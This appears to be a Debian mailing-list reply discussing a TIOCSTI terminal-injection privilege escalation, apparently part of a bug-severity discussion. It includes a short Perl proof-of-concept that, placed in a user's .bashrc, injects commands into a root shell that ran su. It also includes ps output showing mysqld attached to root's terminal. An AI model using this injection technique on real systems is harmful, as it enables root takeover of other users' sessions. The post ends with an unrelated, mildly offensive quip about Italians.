[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Bug#357561: privilege escalation hole

Daniel Leidert <daniel.leidert@wgdd.de> writes:

> Didn't know that special treating of terminal exploits.

Nor did I.  Does anyone have a pointer to a discussion of this?  I
assume it must have been discussed a few times already.

As a dumb user, I wasn't aware of the possibilities TIOCSTI gives you.
It was very interesting to see the effect of calling this perl script
from ~luser/.bashrc and then do "su luser" in a root shell:

require "sys/ioctl.ph";
open(TTY, '/dev/tty');
foreach (split(//,"exit\nid\n")) {
    ioctl(TTY, TIOCSTI(), $_);

I think I'll stop using su now ;-)

BTW, I noticed that mysql-server-5.0 also has a problem similar to
apache.  This is the ps output after a recent "apt-get upgrade":

root      8458  0.0  0.0   3912   904 pts/3    S    Feb28   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     8495  0.0  0.3 126524  3780 pts/3    Sl   Feb28   0:00  \_ /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --ski
root      8496  0.0  0.0   2968   356 pts/3    S    Feb28   0:00  \_ logger -p daemon.err -t mysqld_safe -i -t mysqld

Does the special treating of terminal exploits mean that this is not a
bug?  Or should it be reported with a low severity?  As opposed to
apache, normal users rarely have access to run their own code in mysql
context anyway, so exploitng this may be difficult. 

Italian people are all satanic DAF drivers, huh?  So, people are dying
every day?

Reply to: